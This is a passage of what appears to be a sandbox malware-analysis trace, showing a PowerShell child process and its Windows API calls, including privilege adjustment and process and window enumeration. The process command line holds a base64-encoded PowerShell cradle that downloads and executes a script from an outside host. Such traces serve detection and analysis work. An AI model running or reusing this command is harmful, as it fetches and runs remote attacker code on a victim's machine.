lpProcessInformation=0x3001c58*(hProcess=0x364, hThread=0x360, dwProcessId=0xf10, dwThreadId=0xf14)) returned 1
	[0331.474] CoTaskMemFree (pv=0x330e50) 
	[0331.476] CloseHandle (hObject=0x360) returned 1
	[0331.476] CoTaskMemAlloc (cb=0x3b) returned 0x1b719010
	[0331.476] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c77e028, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c77e028) returned 0x4550
	[0331.484] CoTaskMemFree (pv=0x1b719010) 
	[0331.535] GetCurrentProcess () returned 0xffffffffffffffff
	[0331.535] GetCurrentProcess () returned 0xffffffffffffffff
	[0331.536] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x364, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c77e108, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c77e108*=0x360) returned 1

Process:
	id = "9"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x313fb000"
	os_pid = "0xc8"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 49
	os_tid = 0x7dc

	[0251.895] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0253.388] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0253.388] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0253.388] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0253.388] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0256.496] GetVersionExW (in: lpVersionInformation=0x28d980*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x28d980*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0256.826] GetVersionExW (in: lpVersionInformation=0x28d980*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x28d980*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0256.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0256.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0256.839] GetVersionExW (in: lpVersionInformation=0x28d6f0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x28d6f0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0256.840] SetErrorMode (uMode=0x1) returned 0x1
	[0256.841] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x28d850 | out: lpFileInformation=0x28d850*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0256.842] SetErrorMode (uMode=0x1) returned 0x1
	[0256.845] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x28dac0 | out: lpdwHandle=0x28dac0) returned 0x94c
	[0256.847] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2bd72d8 | out: lpData=0x2bd72d8) returned 1
	[0256.849] VerQueryValueW (in: pBlock=0x2bd72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x28da38, puLen=0x28da30 | out: lplpBuffer=0x28da38*=0x2bd7374, puLen=0x28da30) returned 1
	[0256.852] lstrlenW (lpString="䅁") returned 1
	[0256.861] VerQueryValueW (in: pBlock=0x2bd72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x28d9a8, puLen=0x28d9a0 | out: lplpBuffer=0x28d9a8*=0x2bd7450, puLen=0x28d9a0) returned 1
	[0256.862] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0256.864] CoTaskMemAlloc (cb=0x2e) returned 0x515100
	[0256.864] lstrcpyW (in: lpString1=0x515100, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0256.865] CoTaskMemFree (pv=0x515100) 
	[0256.865] VerQueryValueW (in: pBlock=0x2bd72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x28d9a8, puLen=0x28d9a0 | out: lplpBuffer=0x28d9a8*=0x2bd74a4, puLen=0x28d9a0) returned 1
	[0256.865] lstrlenW (lpString="System.Management.Automation") returned 28
	[0256.865] CoTaskMemAlloc (cb=0x3c) returned 0x50e850
	[0256.865] lstrcpyW (in: lpString1=0x50e850, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0256.865] CoTaskMemFree (pv=0x50e850) 
	[0256.865] VerQueryValueW (in: pBlock=0x2bd72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x28d9a8, puLen=0x28d9a0 | out: lplpBuffer=0x28d9a8*=0x2bd7500, puLen=0x28d9a0) returned 1
	[0256.865] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0256.865] CoTaskMemAlloc (cb=0x20) returned 0x5112b0
	[0256.865] lstrcpyW (in: lpString1=0x5112b0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0256.866] CoTaskMemFree (pv=0x5112b0) 
	[0256.866] VerQueryValueW (in: pBlock=0x2bd72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x28d9a8, puLen=0x28d9a0 | out: lplpBuffer=0x28d9a8*=0x2bd7540, puLen=0x28d9a0) returned 1
	[0256.866] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0256.866] CoTaskMemAlloc (cb=0x44) returned 0x50e850
	[0256.866] lstrcpyW (in: lpString1=0x50e850, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0256.866] CoTaskMemFree (pv=0x50e850) 
	[0256.866] VerQueryValueW (in: pBlock=0x2bd72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x28d9a8, puLen=0x28d9a0 | out: lplpBuffer=0x28d9a8*=0x2bd75a8, puLen=0x28d9a0) returned 1
	[0256.866] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0256.866] CoTaskMemAlloc (cb=0x76) returned 0x4aff80
	[0256.866] lstrcpyW (in: lpString1=0x4aff80, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0256.866] CoTaskMemFree (pv=0x4aff80) 
	[0256.866] VerQueryValueW (in: pBlock=0x2bd72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x28d9a8, puLen=0x28d9a0 | out: lplpBuffer=0x28d9a8*=0x2bd7644, puLen=0x28d9a0) returned 1
	[0256.866] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0256.866] CoTaskMemAlloc (cb=0x44) returned 0x50e850
	[0256.866] lstrcpyW (in: lpString1=0x50e850, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0256.866] CoTaskMemFree (pv=0x50e850) 
	[0256.866] VerQueryValueW (in: pBlock=0x2bd72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x28d9a8, puLen=0x28d9a0 | out: lplpBuffer=0x28d9a8*=0x2bd76a8, puLen=0x28d9a0) returned 1
	[0256.866] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0256.866] CoTaskMemAlloc (cb=0x58) returned 0x4d13c0
	[0256.866] lstrcpyW (in: lpString1=0x4d13c0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0256.866] CoTaskMemFree (pv=0x4d13c0) 
	[0256.866] VerQueryValueW (in: pBlock=0x2bd72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x28d9a8, puLen=0x28d9a0 | out: lplpBuffer=0x28d9a8*=0x2bd7724, puLen=0x28d9a0) returned 1
	[0256.866] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0256.866] CoTaskMemAlloc (cb=0x20) returned 0x5112b0
	[0256.867] lstrcpyW (in: lpString1=0x5112b0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0256.867] CoTaskMemFree (pv=0x5112b0) 
	[0256.867] VerQueryValueW (in: pBlock=0x2bd72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x28d9a8, puLen=0x28d9a0 | out: lplpBuffer=0x28d9a8*=0x2bd73cc, puLen=0x28d9a0) returned 1
	[0256.867] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0256.867] CoTaskMemAlloc (cb=0x66) returned 0x50cb40
	[0256.867] lstrcpyW (in: lpString1=0x50cb40, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0256.867] CoTaskMemFree (pv=0x50cb40) 
	[0256.867] VerQueryValueW (in: pBlock=0x2bd72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x28d9a8, puLen=0x28d9a0 | out: lplpBuffer=0x28d9a8*=0x0, puLen=0x28d9a0) returned 0
	[0256.867] VerQueryValueW (in: pBlock=0x2bd72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x28d9a8, puLen=0x28d9a0 | out: lplpBuffer=0x28d9a8*=0x0, puLen=0x28d9a0) returned 0
	[0256.867] VerQueryValueW (in: pBlock=0x2bd72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x28d9a8, puLen=0x28d9a0 | out: lplpBuffer=0x28d9a8*=0x0, puLen=0x28d9a0) returned 0
	[0256.867] VerQueryValueW (in: pBlock=0x2bd72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x28d978, puLen=0x28d970 | out: lplpBuffer=0x28d978*=0x2bd7374, puLen=0x28d970) returned 1
	[0256.868] CoTaskMemAlloc (cb=0x204) returned 0x4b2990
	[0256.868] VerLanguageNameW (in: wLang=0x0, szLang=0x4b2990, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0256.869] CoTaskMemFree (pv=0x4b2990) 
	[0256.870] VerQueryValueW (in: pBlock=0x2bd72d8, lpSubBlock="\\", lplpBuffer=0x28d9c8, puLen=0x28d9c0 | out: lplpBuffer=0x28d9c8*=0x2bd7300, puLen=0x28d9c0) returned 1
	[0257.250] GetCurrentProcessId () returned 0xc8
	[0257.267] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x28c8f0 | out: lpLuid=0x28c8f0*(LowPart=0x14, HighPart=0)) returned 1
	[0257.270] GetCurrentProcess () returned 0xffffffffffffffff
	[0257.271] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x28c910 | out: TokenHandle=0x28c910*=0x2e8) returned 1
	[0257.272] AdjustTokenPrivileges (in: TokenHandle=0x2e8, DisableAllPrivileges=0, NewState=0x2bdab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0257.274] CloseHandle (hObject=0x2e8) returned 1
	[0257.278] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc8) returned 0x2e8
	[0257.288] EnumProcessModules (in: hProcess=0x2e8, lphModule=0x2bdabb8, cb=0x200, lpcbNeeded=0x28d928 | out: lphModule=0x2bdabb8, lpcbNeeded=0x28d928) returned 1
	[0257.291] GetModuleInformation (in: hProcess=0x2e8, hModule=0x13f370000, lpmodinfo=0x2bdae28, cb=0x18 | out: lpmodinfo=0x2bdae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0257.292] CoTaskMemAlloc (cb=0x804) returned 0x51e200
	[0257.292] GetModuleBaseNameW (in: hProcess=0x2e8, hModule=0x13f370000, lpBaseName=0x51e200, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0257.292] CoTaskMemFree (pv=0x51e200) 
	[0257.293] CoTaskMemAlloc (cb=0x804) returned 0x51e200
	[0257.293] GetModuleFileNameExW (in: hProcess=0x2e8, hModule=0x13f370000, lpFilename=0x51e200, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0257.293] CoTaskMemFree (pv=0x51e200) 
	[0257.294] CloseHandle (hObject=0x2e8) returned 1
	[0257.772] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xc8) returned 0x2e8
	[0257.773] GetExitCodeProcess (in: hProcess=0x2e8, lpExitCode=0x28da58 | out: lpExitCode=0x28da58*=0x103) returned 1
	[0257.781] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12bdb088, Length=0x20000, ResultLength=0x28da20 | out: SystemInformation=0x12bdb088, ResultLength=0x28da20*=0x10a10) returned 0x0
	[0257.794] EnumWindows (lpEnumFunc=0x27566ac, lParam=0x0) returned 1
	[0259.590] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x4d0
	[0260.441] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x558
	[0260.696] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x4d0
	[0260.697] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x4d0
	[0261.008] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x4d0
	[0261.335] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x538
	[0261.959] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x4d0
	[0261.960] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x778
	[0261.960] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x778
	[0262.429] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x4d0
	[0262.430] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x4d0
	[0262.430] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x4d0
	[0262.430] GetWindowThreadProcessId (in: hWnd=0x10220, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x4d0
	[0262.430] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x4d0
	[0262.430] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x4d0
	[0262.430] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x4d0
	[0262.430] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x4d0
	[0262.430] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x4d0
	[0262.430] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x460
	[0262.430] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x4d0
	[0262.431] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x4d0
	[0262.431] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0xa6c
	[0262.431] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0xa68
	[0262.431] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x9f8
	[0262.431] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0xa04
	[0262.431] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x924
	[0262.431] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x8dc
	[0262.431] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x7dc
	[0262.432] GetWindow (hWnd=0x201ec, uCmd=0x4) returned 0x0
	[0262.433] IsWindowVisible (hWnd=0x201ec) returned 0
	[0262.433] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x768
	[0262.433] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x764
	[0262.433] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x820
	[0262.433] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x810
	[0262.433] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x794
	[0262.433] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x83c
	[0262.434] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x7ac
	[0262.434] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0xb44
	[0262.434] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0xb5c
	[0262.434] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x838
	[0262.434] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x4d0
	[0262.434] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x4d0
	[0262.434] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x4d0
	[0262.434] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x4d0
	[0262.434] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x4d0
	[0262.434] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x4d0
	[0262.434] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x4d0
	[0262.434] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x4d0
	[0262.435] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x818
	[0262.435] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x5b8
	[0262.435] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x494
	[0262.435] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x1ec
	[0262.435] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x440
	[0262.435] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x7e8
	[0262.435] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x730
	[0262.435] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x2c8
	[0262.435] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x31c
	[0262.435] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x330
	[0262.435] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x128
	[0262.435] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x5c8
	[0262.436] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x6f8
	[0262.436] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x358
	[0262.436] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x73c
	[0262.436] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0xb0
	[0262.436] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x250
	[0262.436] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x240
	[0262.436] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x790
	[0262.436] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x61c
	[0262.436] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x540
	[0262.436] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x538
	[0262.436] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x568
	[0262.437] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x538
	[0262.437] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x568
	[0262.437] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x538
	[0262.437] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x540
	[0262.437] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x540
	[0262.437] GetWindowThreadProcessId (in: hWnd=0x1010e, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x510
	[0262.437] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x57c
	[0262.437] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x460
	[0262.437] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x554
	[0262.437] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x4d0
	[0262.438] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x528
